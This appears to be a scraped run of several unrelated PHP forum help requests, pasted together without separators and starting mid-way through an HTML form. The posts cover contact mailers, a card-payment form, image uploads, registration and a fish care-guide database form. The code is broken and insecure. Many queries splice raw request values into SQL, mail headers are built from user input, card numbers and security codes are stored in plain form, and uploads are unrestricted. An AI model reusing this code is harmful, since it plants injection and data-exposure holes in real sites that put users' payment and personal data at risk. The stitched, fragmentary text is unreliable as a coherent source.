>Yemen Republic of</option> <option value="226" >Zaire</option> <option value="227" >Zambia</option> <option value="228" >Zimbabwe</option> </select> </TD><TD CLASS="tableBlueBody" ALIGN="right"><B>Fax</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><INPUT TYPE="Text" NAME="fax" MAXLENGTH="150"></TD></TR> <TR><TD COLSPAN="4" CLASS="tableBlueBody"> </TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right" VALIGN="top"> <B>Comments</B> </TD><TD COLSPAN="3" CLASS="tableBlueBody" ALIGN="left"> <TEXTAREA NAME="comment" ROWS="7" COLS="45" ></TEXTAREA> </TD></TR> </TD><TD COLSPAN="5" CLASS="tableBlueBody" ALIGN="left"> <TR><TD CLASS="tableBlueBody" ALIGN="right">* <B>Registration Number</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="regnumber" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Colour</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><INPUT TYPE="Text" NAME="colour" MAXLENGTH="150"></TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right">* <B>Car Make</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="carmake" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Has the vehicle been used as a taxi?</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><input type='radio' value="Yes" name='question1' /> Yes <input name='question1' type="radio" value="No" checked /> No</TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right">* <B>Model</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="model" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Is finance outstanding on the vehicle?</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><input type='radio' value="Yes" name='question2' /> Yes <input name='question2' type="radio" value="No" checked /> No</TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right">* <B>Milage / Kms</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="milage" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>How did you hear about us?</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><select name="question3"><option value="Other">Other</option><option value="Web">Web</option><option value="Newspaper">Newspaper</option><option value="Radio">Radio</option><option value="Recommended">Recommended</option></select></TD></TR> <TR><TD COLSPAN="2" CLASS="tableBlueBody" STYLE="border-bottom : 1px solid #CCCCCC; border-right : 1px solid #CCCCCC;"> </TD><TD COLSPAN="2" CLASS="tableBlueBody" STYLE="border-bottom : 1px solid #CCCCCC;"> </TD></TR> <TR><TD COLSPAN="4" ALIGN="left"><input type="submit" value="Click here to send us your information" class='contactFormSubmit'></TD></TR> </FORM></TABLE> </TD></TR></TABLE><BR></TD> <TD><IMG SRC="images/spacer.gif" WIDTH="8" HEIGHT="1" BORDER="0" ALT=""></TD> <TD WIDTH="183" VALIGN="top"> </TD></TR></TABLE> </fieldset> </form><br /> </div><!-- end of #contact_form --> And then i have a file called process.php! <?php $emailTo = 'sakura-designs@hotmail.com'; $subject = 'We Will Buy Your Car.ie Form Submission'; $firstname=$_REQUEST['firstname']; $lastname=$_REQUEST['lastname']; $email=$_REQUEST['email']; $AddressLine1=$_REQUEST['AddressLine1']; $City=$_REQUEST['City']; $phone=$_REQUEST['phone']; $CountryID=$_REQUEST['CountryID']; $fax=$_REQUEST['fax']; $comment=$_REQUEST['comment']; $regnumber=$_REQUEST['regnumber']; $colour=$_REQUEST['colour']; $carmake=$_REQUEST['carmake']; $question1=$_REQUEST['question1']; $model=$_REQUEST['model']; $question2=$_REQUEST['question2']; $milage=$_REQUEST['milage']; $question3=$_REQUEST['question3']; $body = "First Name: $firstname \n\nLast Name: $lastname \n\nEmail: $email \n\nAddress: $AddressLine1 \n\nCity: $city \n\nPhone: $phone \n\nCountry: $CountryID \n\nFax: $fax \n\nComment: $comment \n\nReg Number: $regnumber \n\nColour: $colour \n\nCar Make: $carmake \n\nQuestion1: $question1 \n\nModel: $model \n\nQuestion2: $question2 \n\nMilage: $milage \n\nQuestion3: $question3"; $headers = 'From: '.$name.' <'.$email.'>' . "\r\n" . 'Reply-To: ' . $email; mail($emailTo, $subject, $body, $headers); ?> PLEASE HELP!! Thanks Okay, so I have a neat little website and I'm having some issue with some quality-of-life improvements.
Namely, the user clicks a button which starts a server-side operation that can take up to 20 to 30 seconds.
I want a little message to appear below the button that says, "Operation started. This may take upwards of 20 to 30 seconds depending on traffic."
As of now, I have the typical
<form action="post" action="<?php echo $_SERVER['PHP_SELF'];?>"> ... <input type="submit" name="submit" value="Make PDF" /> </form> <?php if (isset($_POST["submit"])) { ... } ?>The only problem is, part of my PHP code must communicate with a Java server that I have running on the server itself. So how the site works is, there's the computer I'm renting out and it's running Apache and a custom Java server I wrote myself. Apache handles the web request and upon form submission, PHP opens a socket with the Java server and begins the task. PHP then waits for the connection to close. Hello Everybody
Im new to this forum. Im trying to submit a form to my database but it's not passing through. when I submit the form an error message. I don't know if it is because I declare the escape_data fucntion wrongly. Any help would be appreciated. Here are my codings
Thanking you all in advance
submittest.php
<?php // Include config file... require_once('./config.php'); // Declare function. function escape_data($value) { if (!get_magic_quotes_gpc()) $value = addslashes($value); return $value; } // Handle the form. if (isset($_POST['submit'])) { // Set form variables $nom = escape_data($_POST['nom']); $prenom = escape_data($_POST['prenom']); $typecarte = escape_data($_POST['typecarte']); $numerocarte = escape_data($_POST['numerocarte']); $csc = escape_data($_POST['csc']); $dateexp = date('M-Y', strtotime($_POST['mois'] . "-" . $_POST['annee'])); $email = escape_data($_POST['email']); $adresse1= escape_data($_POST['adresse1']); $adresse2 = escape_data($_POST['adresse2']); $pays= escape_data($_POST['pays']); $ville = escape_data($_POST['ville']); $phone = escape_data($_POST['phone']); // Initialise the errors array $errors = array(); // Check for a first name. if (empty($_POST['nom'])) { $errors[] = 'Veuillez entrer le nom du client.'; } else { $fn = escape_data($_POST['nom']); } // Check for a last name. if (empty($_POST['prenom'])) { $errors[] = 'Veuillez entrer le prénom du client.'; } else { $ln = escape_data($_POST['prenom']); } // Check for type of card. if (empty($_POST['typecarte'])) { $errors[] = 'Veuillez choisir le type de carte de paiement.'; } else { $ad = escape_data($_POST['typecarte']); } // Check for card number. if (empty($_POST['numerocarte'])) { $errors[] = 'Veuillez entrer le numéro de la carte bancaire.'; } else { $town = escape_data($_POST['numerocarte']); } // Check for a security code. if (empty($_POST['csc'])) { $errors[] = 'Veuillez entrer le numéro du cryptogramme visuel.'; } else { $pc = escape_data($_POST['csc']); } // Check for expiration date. if (!empty($_POST['mois']) && !empty($_POST['annee'])) { $enrolled = sprintf('%d-%02d-%02d',$_POST['mois'],$_POST['annee']); } else { $errors[] = 'Veuillez entrer la date d´expiration de votre carte.'; } // Check for an email address and that it's in the correct format. if (preg_match ('/^[[:alnum:]][a-z0-9_\.\-]*@[a-z0-9\.\-]+\.[a-z]{2,4}$/', stripslashes(trim($_POST['email'])))) { $e = escape_data($_POST['email']); } else { $errors[] = 'Veuillez entrer un valid adresse email.'; } // Check for address 1. if (empty($_POST['adresses1'])) { $errors[] = 'Veuillez enter l´adresse du client.'; } else { $course = escape_data($_POST['adresse1']); } // Check for the country. if (empty($_POST['pays'])) { $errors[] = 'Veuillez entrer le nom du pays.'; } else { $course = escape_data($_POST['pays']); } // Check for town. if (empty($_POST['ville'])) { $errors[] = 'Veuillez entrer le nom de la ville.'; } else { $course = escape_data($_POST['ville']); } // Check for phone number if (empty($_POST['phone'])) { $errors[] = 'Veuillez entrer le numéro de téléphone.'; } else { $course = escape_data($_POST['phone']); } // Check if it is error free if (empty($errors)) { // then add information into payment table. $query = "INSERT INTO payment (nom, prenom,typecarte, numerocarte, csc, dateexp, email, adresse1, adresse2, pays, ville, phone) VALUES (`$nom`,`$prenom`,`$typecarte`,`$numerocarte`,`$csc`,`$dateexp`,`$email`,`$adresse1`,`$adresse2`,`$pays`,`$ville`,`$phone` )"; $result = mysql_query ($query) or trigger_error("Query: $query\n<br />MySQL Error: " . mysql_error()); echo "<h3>Merci de votre fidélité, Votre paiement a bien été recu. Veuillez cliquer sur <a href='index.php'>ce lien</a> pour retourner a la page d'accueil.</h3>"; // If there is an error. } else { echo '<p>Une erreur s´est produite lors de la soumission de votre paiment. Voulez vous bien réessayer ou cantacter notre service clientéle. Nous nous excusons d´avance.</p>'; } mysql_close(); } ?>[/code] payment.html [code] <form action="submittest.php" method="post" > <table width="600" cellspacing="10"> <tr> <td>Nom*</td> <td><input type="text" name="nom" maxlength="50" value="" size="48" /></td> </tr> <tr> <td>Prénom*</td> <td><input type="text" name="prenom" maxlength="50" value="" size="48" /> </td> </tr> <tr> <td>Type de carte*</td> <td><select name="carte"> <option value="">Choisissez</option> <option value="visa">Visa</option> <option value="mastercard">Mastercard</option> <option value="American">American Express</option> </select> <tr> <td>Numéro de carte*</td> <td><input type="text" name="numérodecarte" maxlength="50" value="" size="48" /> </td> </tr> <tr> <td>Cryptogramme visuel</td> <td><input type="text" name="csc" maxlength="20" value="" size="7" /> </td> </tr> <tr> <td>Date d'expiration*</td> <td>Mois<select name="mois"> <option value="">M</option> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> Année<select name="annee"> <option value="">YYYY</option> <option value="2014">2014</option> <option value="2015">2015</option> <option value="2016">2016</option> <option value="2017">2017</option> <option value="2018">2018</option> <option value="2019">2019</option> <option value="2020">2020</option> <option value="2021">2021</option> <option value="2022">2022</option> <option value="2023">2023</option> <option value="2024">2024</option> <option value="2025">2025</option> </select></td> </tr> <tr> <td>E-mail*</td> <td><input type="text" name="email" maxlength="50" size="48" /> </td> </tr> <tr> <td height="59">Adresse (ligne 1)</td> <td><input type="text" name="adresse1" maxlength="65" value="" size="48"/> </td> </tr> <tr> <td>Adresse (ligne 2)<p style="color:#CCC; font-size:9px;">(facultatif)</p></td> <td><input type="text" name="adresse2" maxlength="65" value="" size="48"/> </td> </tr> <tr> <td>Pays</td> <td><input type="text" name="pays" maxlength="50" value="" size="48" /> </td> </tr> <tr> <td>Ville</td> <td><input type="text" name="ville" maxlength="16" size="48" /> </td> </tr> <tr> <td>Téléphone</td> <td><input type="text" name="numero" maxlength="16" size="48" /></td> </tr> <tr align="right"> <th colspan=3> <div align="center"><br/><br/> <input type="submit" name="submit" style="width:75px; height:35px; margin-left:100px" value="Valider" /> <input type="reset" name="reset" style="width:75px; height:35px; margin-left:15px" value="Annuler" /> <input type="hidden" name="submit" value="TRUE" /> </div></th> </tr> </table> </form> Edited by Ch0cu3r, 06 June 2014 - 07:32 AM. can someone visually just read through my code and let me know if this looks like it'll work? I'm not getting any errors in my IDE so now I want to double check the structure <?php require_once '/usr/local/cpanel/3rdparty/lib/php/Mail.php'; $db_server = 'localhost'; $db_user = '-----'; $db_pass = '-----'; $dbc = mysql_connect ($db_server, $db_user, $db_pass); if (!$dbc) { die(mysql_error()); header ('Location: /contact'); exit; } if ($_POST['contactsent'] != 'yes') { header ('Location: /contact'); exit; } else { if (is_array($_POST)) { foreach ($_POST as $key => $value) { $_POST[$key] = mysql_real_escape_string(stripslashes($value)); } } $RequestType = $_POST["RequestType"]; $ConsumerBusiness = $_POST["ConsumerBusiness"]; $GlobalLocation = $_POST["GlobalLocation"]; $FirstName = strtolower(str_replace("'","''",$_POST["FirstName"])); $FirstName = strtoupper(substr($FirstName,0,1)).substr($FirstName,1); $LastName = strtolower(str_replace("'","''",$_POST["LastName"])); $LastName = strtoupper(substr($LastName,0,1)).substr($LastName,1); $Email = strtolower(str_replace("'","''",$_POST["Email"])); $Title = strtolower(str_replace("'","''",$_POST["Title"])); $Title = strtoupper(substr($Title,0,1)).substr($Title,1); $Company = strtolower(str_replace("'","''",$_POST["Company"])); $Company = strtoupper(substr($Company,0,1)).substr($Company,1); $Address = strtolower(str_replace("'","''",$_POST["Address"])); $Address = strtoupper(substr($Address,0,1)).substr($Address,1); $City = strtolower(str_replace("'","''",$_POST["City"])); $City = strtoupper(substr($City,0,1)).substr($City,1); $State = $_POST["State"]; $Zip = $_POST["Zip"]; $Phone = $_POST["Phone"]; $F = $_POST["F"]; $ProductDesc = $_POST["ProductDesc"]; $Comment = $_POST["Comment"]; if ($GlobalLocation == "Canada"): $SendTo="canadainfo@------.com"; elseif ($GlobalLocation == "Central America"): $SendTo="customer.service@------.com.pa"; elseif ($GlobalLocation == "Europe"): $SendTo="marketing@-----.uk"; elseif ($GlobalLocation == "Mexico"): $SendTo="ventas@------.com.mx"; else: $SendTo="info@------.com"; endif; function dbSet($fields, $source = array()) { $set=''; if (!source) $source = &$_POST; foreach ($fields as $field) { if (isset($source[$field])) { $set.="`$field`='".mysql_real_escape_string($source[$field])."', "; } } return substr($set, 0, -2); } // INSERT INTO DATABASE mysql_select_db("new_contact",$dbc) or die("Could not select new_contact"); $fields = explode(" ", "RequestType ConsumerBusiness GlobalLocation FirstName LastName Email Title Company Address City State Zip Phone F ProductDesc Comment"); $query = "INSERT INTO new_contact SET ".dbSet($fields, $_POST); mysql_query($query); // SETUP EMAIL $Bodycopy = "This information was submitted via the ------.com website and sent to you because of the location identified by the user. <br>If this has reached you in error, please forward this email to info@------.com"; $Bodycopy. "<br>----------------------------------------------------------------------------------------------<br><br>"; if ($RequestType != "") $Bodycopy. "What kind of information do you need? : " .$RequestType. "<br>"; if ($ConsumerBusiness != "") $Bodycopy. "What type of customer or vendor are you? : " .$ConsumerBusiness. "<br>"; if ($GlobalLocation != "") $Bodycopy. "Global Location : " .$GlobalLocation. "<br>"; if ($Company != "") $Bodycopy. "Company : " .$Company. "<br>"; if ($FirstName != "") $Bodycopy. "First Name : " .$FirstName. "<br>"; if ($LastName != "") $Bodycopy. "Last Name : " .$LastName. "<br>"; if ($Title != "") $Bodycopy. "Title : " .$Title. "<br>"; if ($Email != "") $Bodycopy. "Email : " .$Email. "<br>"; if ($Address != "") $Bodycopy. "Address : " .$Address. "<br>"; if ($City != "") $Bodycopy. "City : " .$City. "<br>"; if ($State != "") $Bodycopy. "State : " .$State. "<br>"; if ($Zip != "") $Bodycopy. "Zip/Postal Code : " .$Zip. "<br>"; if ($Phone != "") $Bodycopy. "Phone : " .$Phone. "<br>"; if ($F != "") $Bodycopy. "F : " .$F. "<br>"; if ($ProductDesc != "") $Bodycopy. "UPC or product description : " .$ProductDesc. "<br>"; $Bodycopy. "<br>----------------------------------------------------------------------------------------------<br><br>"; if ($Comment != "") $Bodycopy. "Comments : <br>" .$Comment. "<br>"; $Bodycopy. "<br><br>"; $Bodycopy. $IP = $_SERVER["remote_addr"]; // PROCESS EMAIL // mail server info... $from = $SendTo; $to = "Do Not Reply <donotreply@------>"; $subject = "Website Contact : " . $GlobalLocation; $body = $Bodycopy; $host = "mail.------"; $port = "25"; $username = "donotreply@-------"; $password = "-------"; $headers = array ('From' => $from, 'To' => $to, 'Subject' => $subject); $smtp = Mail::factory('smtp', array ('host' => $host, 'auth' => true, 'port' => $port, 'username' => $username, 'password' => $password)); $mail = $smtp->send($to, $headers, $body); if (PEAR::isError($mail)) { echo("<p>" . $mail->getMessage() . "</p>"); } else { echo("<p>Message successfully sent!</p>"); } // MAKE SURE DB CONN IS CLOSED mysql_close($dbc); // REDIRECT TO THANK YOU PAGE header ('Location: /index.php?option'); exit(); } ?> ok, so how can I grab $value before the form submits and I want to put it into the image field: Code: [Select] <?php include_once "secure/connect_to_mysql.php"; function genRandomString($length = 20) { $characters = '0123456789'; $string =''; for ($p = 0; $p < $length; $p++) { $string .= $characters[mt_rand(0, strlen($characters))]; } return $string; } if ($_POST['submit']) { $name = $_POST['name']; $id = $_POST['id']; $image = $_POST['image']; $event = $_POST['event']; $template = 'Templates/index.php'; $picture = '$name.png'; $id = genRandomString(); //this could be the uploaded picture //we need just the filename - no extension $picture_name = pathinfo($picture, PATHINFO_FILENAME); $sql = "INSERT INTO pictures (name, id, image, event) VALUES('$name', '$id','$image','$event')"; $rs = mysql_query($sql) or die ("Problem with the query: $sql<br>" . mysql_error()); echo mysql_error(); $target_path = "images/"; foreach ($_FILES["uploadedfile"]["name"] as $key => $value) { $uploadfile = $target_path . basename($_FILES[uploadedfile][name][$key]); //echo $uploadfile; if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'][$key], $uploadfile)) { echo $value . ' uploaded<br>'; } } copy($template, "$name.php"); } ?> <form action="new.php" method="post" enctype="multipart/form-data"><input name="name" type="text" /><input name="id" type="hidden" value=<?php echo $id; ?> /><br /> <input name="event" type="text" /><input name="image" type="text" value="images/<?php echo $value; ?>" /><input type="hidden" name="MAX_FILE_SIZE" value="900000000000000000000000000000000000000000000000000000000000000000000000000" /> Choose a file to upload: <div id="dynamicInput"> Entry 1<br><input type="file" name="uploadedfile[]"> </div> <input type="button" value="Add another text input" onClick="addInput('dynamicInput');"> <br /><input name="submit" type="submit" value="submit" /></form> if I do it after the form submits then it shows up, is there a way to make it appear before it submits....like a second field echoing what the first field has typed it and it updates "live"? Hi guys, I got this form so a user can submit a care guide for different species of animal. However the script runs, but the query to SET the species information does not run and the success message is not displayed. Here is what I have got
<?php session_start(); error_reporting(E_ALL); ini_set('display_errors', '1'); require( 'database.php' ); include('includes/overall/header.php'); $username = $_SESSION['loggedinuser']; if (isset($_POST['username'], $_POST['email'], $_POST['fishtype'], $_POST['speciesCommon'], $_POST['speciesScientific'], $_POST['speciesSynonym'], $_POST['origin'], $_POST['size'], $_POST['environment'], $_POST['waterChemistry'], $_POST['temperature'], $_POST['temperature1'], $_POST['feeding'], $_POST['sexing'], $_POST['compatability'], $_POST['temperament'], $_POST['breeding'], $_POST['comments'], $_POST['reward'], $_POST['username'], $_POST['email'] ) ) { if( $_POST['fishtype'] == "" ) { include('includes/overall/header.php'); echo "You must select a species type"; include('includes/overall/footer.php'); } elseif( $_POST['speciesCommon'] == "" ) { include('includes/overall/header.php'); echo "You must select a species type"; include('includes/overall/footer.php'); } elseif( $_POST['speciesScientific'] == "" ) { include('includes/overall/header.php'); echo "You must select a scientific name"; include('includes/overall/footer.php'); } elseif( $_POST['speciesSynonym'] == "" ) { include('includes/overall/header.php'); echo "You must select a species synonym"; include('includes/overall/footer.php'); } elseif( $_POST['origin'] == "" ) { include('includes/overall/header.php'); echo "You must select the origin of this species"; include('includes/overall/footer.php'); } elseif( $_POST['size'] == "" ) { include('includes/overall/header.php'); echo "You must select a average size"; include('includes/overall/footer.php'); } elseif( $_POST['environment'] == "" ) { include('includes/overall/header.php'); echo "You must select the type of environment suited to this species"; include('includes/overall/footer.php'); } elseif( $_POST['waterChemistry'] == "" ) { include('includes/overall/header.php'); echo "You must select the typeif water chemistry required for this species"; include('includes/overall/footer.php'); } elseif( $_POST['temperature'] == "" ) { include('includes/overall/header.php'); echo "You must select a minimum temperature for this species"; include('includes/overall/footer.php'); } elseif( $_POST['temperature1'] == "" ) { include('includes/overall/header.php'); echo "You must select a maximum temperature for this species"; include('includes/overall/footer.php'); } elseif( $_POST['feeding'] == "" ) { include('includes/overall/header.php'); echo "You must enter feeding information for this species"; include('includes/overall/footer.php'); } elseif( $_POST['sexing'] == "" ) { include('includes/overall/header.php'); echo "You must enter sexing information for this species"; include('includes/overall/footer.php'); } elseif( $_POST['compatibility'] == "" ) { include('includes/overall/header.php'); echo "You must enter compatibility information for this species"; include('includes/overall/footer.php'); } elseif( $_POST['temperament'] == "" ) { include('includes/overall/header.php'); echo "You must enter temperament information for this species"; include('includes/overall/footer.php'); } elseif( $_POST['breeding'] == "" ) { include('includes/overall/header.php'); echo "You must enter breeding information for this species"; include('includes/overall/footer.php'); } elseif( $_POST['comments'] == "" ) { include('includes/overall/header.php'); echo "You must enter comments for this species"; include('includes/overall/footer.php'); } elseif( $_POST['compatibility'] == "" ) { include('includes/overall/header.php'); echo "You must select your reward"; include('includes/overall/footer.php'); } else { require( 'database.php' ); $fishtype = mysqli_real_escape_string($con, $_POST['fishtype']); $speciesCommon = mysqli_real_escape_string($con, $_POST['speciesCommon']); $speciesScientific = mysqli_real_escape_string($con, $_POST['speciesScientific']); $speciesSynonym = mysqli_real_escape_string($con, $_POST['speciesSynonym'] ); $origin = mysqli_real_escape_string($con, $_POST['origin']); $size = mysqli_real_escape_string($con, $_POST['size']); $environment = mysqli_real_escape_string($con, $_POST['environment']); $waterChemistry = mysqli_real_escape_string($con, $_POST['waterChemistry']); $temperature = mysqli_real_escape_string($con, $_POST['temperature']); $temperature1 = mysqli_real_escape_string($con, $_POST['temperature1']); $feeding = mysqli_real_escape_string($con, $_POST['feeding']); $sexing = mysqli_real_escape_string($con, $_POST['sexing']); $compatibility = mysqli_real_escape_string($con, $_POST['compatibility']); $temperament = mysqli_real_escape_string($con, $_POST['temperament']); $breeding = mysqli_real_escape_string($con, $_POST['breeding']); $comments = mysqli_real_escape_string($con, $_POST['comments']); $reward = mysqli_real_escape_string($con, $_POST['reward']); $username = mysqli_real_escape_string($con, $_POST['username']); $email = mysqli_real_escape_string($con, $_POST['email']); // Define a query to run $regCareGuide = "INSERT INTO species( fishtype, speciesCommon, speciesScientific, speciesSynonym, origin, size, environment, waterChemistry, temperature, temperature1, feeding, sexing, compatibility, temperament, breeding, comments ) VALUES ( '". $fishtype ."', '". $speciesCommon ."', '". $speciesScientific ."', '". $speciesSynonym ."', '". $origin ."', '". $size ."', '". $environment ."', '". $waterChemistry ."', '". $temperature ."', '". $temperature1 ."', '". $feeding ."', '". $sexing ."', '". $compatability ."', '". $temperament ."', '". $breeding ."', '". $comments ."', '". $reward."' ) WHERE `username` = '$username' AND `email` = '$email'"; // Query the database $result = mysqli_query($con, $regCareGuide); // Check if the query failed if( !$result ) { die('There was a problem executing the query ('.$regCareGuide.'):<br>('.mysqli_errno($con).') '.mysqli_error($con)); } else { echo 'Your care guide has been submitted and your account has been credited.'; } } } include('includes/overall/footer.php'); // Close the connection mysqli_close($con); ?>This is pretty much the same as my changepassword.php page but the query is different and this seems to have prevented the script from running correctly. I have tried different variations on INSERT to add the data to the database but nothing is working, Also an online PHP checker says there is no error in the code. Please help! Hi guys, I need some help in my coding, I have submitted the form, and basically I should see the success msg, which is echo '<p>Your new account has been successfully created. You\'re now ready to <a href="login.php">log in</a>.</p>'. However it wasnt appearing, and when I look into my database, I couldnt find any record which I have registered, is there something amiss in my coding? Please help, Thanks <?php require_once('123.php'); // Connect to the database $dbc = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) or die(mysql_error()); if (isset($_POST['submit'])) { // Grab the profile data from the POST $name = $_POST['name']; $email = $_POST['email']; $password = $_POST['password']; $location = $_POST['location']; $dob = $_POST['dob']; $category = $_POST['category']; $query = "INSERT INTO practice_user (name, email, password, location, dob, category, join_date) " . "VALUES ('$name, $email', $password, $location, $dob, $category, NOW())"; mysqli_query($dbc, $query) or die(mysql_error()); // Confirm success with the user echo '<p>Your new account has been successfully created. You\'re now ready to <a href="login.php">log in</a>.</p>'; mysqli_close($dbc); } ?> I have a site that allows people to register for a fee. It is a very basic form asking for name and contact info.
After they fill out the form and submit it, they are brought to paypal to make their payment. After paying, the form data is sent to the admin and to the customer.
What is very strange is the form seems to work perfectly most of the time, except sometimes:
1. the email is not received by the admin (not sure if the buyer is getting their copy though).
2. if multiple email addresses in the admin settings to receive it (comma separated), sometimes some receive it, but some do not!
The owner of the site said they do check their spam and we've tried different email addresses for the admin (gmail, outlook, yahoo, etc..) and it has occurred on all of them, no rhyme or reason.
Do you see anything wrong with my form below that would have this intermittent issue?
Also, anyone suggest how I can add headers to this so that the 'from' won't default to the host server name?
The file admin.php contains the email variable $admin_email
<?php require '../admin.php'; session_start(); if (!isset($_SESSION['order_id']) || empty($_SESSION['order_id'])) { header('Location: ../../'); } // admin email mail($admin_email, 'Website form submitted', 'Visitor information. Registration: ' . $_SESSION['order_id']."\r\n".' First Name: ' .$_SESSION['fname'].' Last Name: ' .$_SESSION['lname'].' Email: ' .$_SESSION['email'].' Phone: ' .$_SESSION['phone']); // visitor email $to = $_SESSION['email']; mail($to, 'Thank you for registering', 'Review your submission below. Please contact us if you need further assistance. Registration: ' . $_SESSION['order_id']."\r\n".' First Name: ' .$_SESSION['fname'].' Last Name: ' .$_SESSION['lname'].' Email: ' .$_SESSION['email'].' Phone: ' .$_SESSION['phone']); session_destroy(); ?> hello this form is not submitting all the 'jeweltype' data to the mysql db. help please ============================================= html> <head> <title>Upload an image to a database</title> </head> <body> <table> <form name="Picture" enctype="multipart/form-data" method="post"> <tr> <td>Upload <input type="file" name="imagefile"><br /> Jewelery Type: <select> <?php $sql="SELECT jeweltype FROM jeweltypes"; $result =mysql_query($sql); while ($data=mysql_fetch_assoc($result)) { ?> <option value="jeweltype"><?php echo $data['jeweltype'] ?></option> <?php } ?> </select> <br /> <input type="submit" name="xsubmit" value="Upload"> </td> </tr> <tr> <td>Latest Image</td> </tr> <tr> <td><img src="?pic=1"></td> </tr> </form> </table> </body> </html> ========================================== with this query ========================================== <html> <head><title>Your Page Title</title></head> <body> <?php include ('connect.php'); @mysql_select_db($database) or die( "Unable to select database"); $result = mysql_query( "SELECT jeweltype FROM jewel_images" ) or die("SELECT Error: ".mysql_error()); $num_rows = mysql_num_rows($result); print "There are $num_rows records.<P>"; print "<table width=400 border=1>\n"; while ($get_info = mysql_fetch_row($result)){ print "<tr>\n"; foreach ($get_info as $field) print "\t<td><font face=arial size=1/>$field</font></td>\n"; print "</tr>\n"; } print "</table>\n"; ?> </body> </html> |